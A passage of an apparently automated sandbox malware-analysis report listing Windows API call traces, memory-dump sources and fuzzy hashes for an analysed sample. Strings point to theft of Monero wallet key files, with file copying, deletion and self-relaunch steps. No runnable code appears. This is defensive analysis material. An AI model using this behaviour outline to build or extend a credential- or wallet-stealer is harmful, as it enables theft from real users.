                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: ac29cd356ab6d36ef9281b902226343e9fedaa7f5f8256af2c6b4faaed6b6f90
                              • Instruction ID: 1174fdb06f9a7a0feb3b8c94c094f514dd2f2c62c6dd52bb5411192b37544728
                              • Opcode Fuzzy Hash: ac29cd356ab6d36ef9281b902226343e9fedaa7f5f8256af2c6b4faaed6b6f90
                              • Instruction Fuzzy Hash: 07612F70A1024CDBDB28EFA5CC96FED77F9AF44340F108558FA0A5B192EB706A09CB51
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,009BDE80,00000000,00020119,?), ref: 00BF40F4
                              • RegQueryValueExA.ADVAPI32(?,009BED60,00000000,00000000,00000000,000000FF), ref: 00BF4118
                              • RegCloseKey.ADVAPI32(?), ref: 00BF4122
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4147
                              • lstrcat.KERNEL32(?,009BED18), ref: 00BF415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 4db23a7ad258b08ddf1d2c80af9e7696de25db5b1305cbfbc28f2efdfa618af2
                              • Instruction ID: 3baeafb753dd300c56ee80950d0d5902bebe677f0d875a0a32151dce1a650a66
                              • Opcode Fuzzy Hash: 4db23a7ad258b08ddf1d2c80af9e7696de25db5b1305cbfbc28f2efdfa618af2
                              • Instruction Fuzzy Hash: 70419CB6D00108ABDB24FBA0DC46FFE73BDAB58700F044998B71557181EA755B8D8BE2
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00BF696C
                              • sscanf.NTDLL ref: 00BF6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BF69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BF69C0
                              • ExitProcess.KERNEL32 ref: 00BF69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 6673cf06c561d0d1a6337bd7ae052ed8471d35ca76f7ba93ed46e4b6e634b5c9
                              • Instruction ID: 78926d6dbf31ae357fd66aaa829dc88c026af846b8a6c046be219210755ded8c
                              • Opcode Fuzzy Hash: 6673cf06c561d0d1a6337bd7ae052ed8471d35ca76f7ba93ed46e4b6e634b5c9
                              • Instruction Fuzzy Hash: 7A21B8B5D1420CAFCB18EFE4D949AEEB7B5FF48300F04856AE506B3250EB745609CB69
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,009AB9F0,00000000,00020119,?), ref: 00BF7E5E
                              • RegQueryValueExA.ADVAPI32(?,009BDCE0,00000000,00000000,000000FF,000000FF), ref: 00BF7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00BF7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: dee1dd683cdfcd90fa752526e008283d7f54f4f04dab3a77f599b1022374ef66
                              • Instruction ID: 018c86fa5ad8a837702cfc05d066f08ee1f09f02e634e7a67546960098ad366c
                              • Opcode Fuzzy Hash: dee1dd683cdfcd90fa752526e008283d7f54f4f04dab3a77f599b1022374ef66
                              • Instruction Fuzzy Hash: 19116DB1A44209AFD714CB95DD49F7BBBBCEB04710F1041AAF705A7280DB7458098BA1
                              APIs
                              • StrStrA.SHLWAPI(009BE8F8,?,?,?,00BF140C,?,009BE8F8,00000000), ref: 00BF926C
                              • lstrcpyn.KERNEL32(00E2AB88,009BE8F8,009BE8F8,?,00BF140C,?,009BE8F8), ref: 00BF9290
                              • lstrlen.KERNEL32(?,?,00BF140C,?,009BE8F8), ref: 00BF92A7
                              • wsprintfA.USER32 ref: 00BF92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: e24a02f302a9fcb62095cd3e5741c02a6b6e8a60774384eca7af35bf8e1dfc06
                              • Instruction ID: 6382e366ad5bd20132448ea0d816c261e0ef66d243710b445604c94bd09895f8
                              • Opcode Fuzzy Hash: e24a02f302a9fcb62095cd3e5741c02a6b6e8a60774384eca7af35bf8e1dfc06
                              • Instruction Fuzzy Hash: C0011A7550020CFFCB04DFECD988EAE7BB9EB48350F188168F909AB240C631AA45DB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BE12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BE12F5
                              • RegCloseKey.ADVAPI32(?), ref: 00BE12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 46f898041863b77dc2c01dc03eb220280f5b0e4e011072ecf8440653801c220d
                              • Instruction ID: 0303e8c5eeb90b57bfcd0e322174f28ef3b65760777813069e2fe090609c41f2
                              • Opcode Fuzzy Hash: 46f898041863b77dc2c01dc03eb220280f5b0e4e011072ecf8440653801c220d
                              • Instruction Fuzzy Hash: B50131B9A40208BFDB18DFE5DC49FAEB7B8FB48701F108169FB05A7280D6719A058F51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 77a93ec95e87318f01434b690af956b094f8cc25d2abdb9fde95ea2d02653b01
                              • Instruction ID: a89f771fd85e1133196b14662520385ccd9444770b801f30a436d9bedab11a38
                              • Opcode Fuzzy Hash: 77a93ec95e87318f01434b690af956b094f8cc25d2abdb9fde95ea2d02653b01
                              • Instruction Fuzzy Hash: 4541D77150075C5EDB228B24CD84FFBBFE99F45704F1484E8EA8A87182D2719A88DF60
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BF6663
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF6726
                              • ExitProcess.KERNEL32 ref: 00BF6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: c0c6ff3982d74508637a5eed0db50bccc27278644cc0bee96e17ac723481189c
                              • Instruction ID: a9adc6500fb6596487f44e6502bb49a7a8e24f505d32a68570b76133c1253038
                              • Opcode Fuzzy Hash: c0c6ff3982d74508637a5eed0db50bccc27278644cc0bee96e17ac723481189c
                              • Instruction Fuzzy Hash: 1231D8B1801218ABDB18EB50DC95BEEB7B8AF44300F405199F30977191DFB46A4DCF9A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C00E28,00000000,?), ref: 00BF882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF8836
                              • wsprintfA.USER32 ref: 00BF8850
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: ee7c65fa7b6814321a4b70376c0e72bf71e54042fc39cefb1dd41e1a19755855
                              • Instruction ID: 972bab36d4471da358f9446d6586d20191f1c5ccb108edf6028921756d7a0ffb
                              • Opcode Fuzzy Hash: ee7c65fa7b6814321a4b70376c0e72bf71e54042fc39cefb1dd41e1a19755855
                              • Instruction Fuzzy Hash: 72213DB1A40208AFDB18DF95DD49FAEBBB8FB48701F144169F605B7280C779A905CBA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BF951E,00000000), ref: 00BF8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF8D62
                              • wsprintfW.USER32 ref: 00BF8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 0cdb9a9dd3b075daaa6c7e08a7427c077fcc82ecd0af214ee699fd4c668b0264
                              • Instruction ID: cd9922243008cd5eb60b9a5ed7eed345b0b69d43bb6ef8500225046d7a66b523
                              • Opcode Fuzzy Hash: 0cdb9a9dd3b075daaa6c7e08a7427c077fcc82ecd0af214ee699fd4c668b0264
                              • Instruction Fuzzy Hash: E3E08CB0A40208BFD728DB95DC0EE6977B8EB04702F0441A4FE09A7280DA719E058B96
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BEA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00BEA3FF
                              • lstrlen.KERNEL32(00000000), ref: 00BEA6BC
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00BEA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 42413800d67bd619317d92e50e3244fe21b162cc311bb90ef58ebc8d1d8e01de
                              • Instruction ID: 26d76933853d805b8d1e4f45e6922147b0d0a965d3a97e8f29ee8da936738749
                              • Opcode Fuzzy Hash: 42413800d67bd619317d92e50e3244fe21b162cc311bb90ef58ebc8d1d8e01de
                              • Instruction Fuzzy Hash: CAE1C1B281010C9BDB19EBA4DC91EFE73B8AF14340F5481A9F61A77091DF706A4DCB62
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BED481
                              • lstrlen.KERNEL32(00000000), ref: 00BED698
                              • lstrlen.KERNEL32(00000000), ref: 00BED6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00BED72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: cd4523fb22056fd83c6b666c01cd7ca1049c178d606a56563aa71118e5e1d10e
                              • Instruction ID: 311906b4cfc406d6704b09ff002f583838551df32305ee2c3439a6b658dd2b98
                              • Opcode Fuzzy Hash: cd4523fb22056fd83c6b666c01cd7ca1049c178d606a56563aa71118e5e1d10e
                              • Instruction Fuzzy Hash: 9391DEB191010C9BDB18EBA4DC96DFE73B8AF14340F5481A9F61A77091EF746A0DCB62
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BED801
                              • lstrlen.KERNEL32(00000000), ref: 00BED99F
                              • lstrlen.KERNEL32(00000000), ref: 00BED9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00BEDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 29b053b1a918ff8abc2064c006dac675ae68806b3e244c8e33abf7266fbdaedb
                              • Instruction ID: bd95615a0989c3f4c6b142bf01339bd7fe202366fb83d3ba0ae2300bc4c8a92a
                              • Opcode Fuzzy Hash: 29b053b1a918ff8abc2064c006dac675ae68806b3e244c8e33abf7266fbdaedb
                              • Instruction Fuzzy Hash: 8A81BDB191010C9BDB18EBA4DC56DFE73B8AF14340F5485A9F60AB7091EF746A0DCB62
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
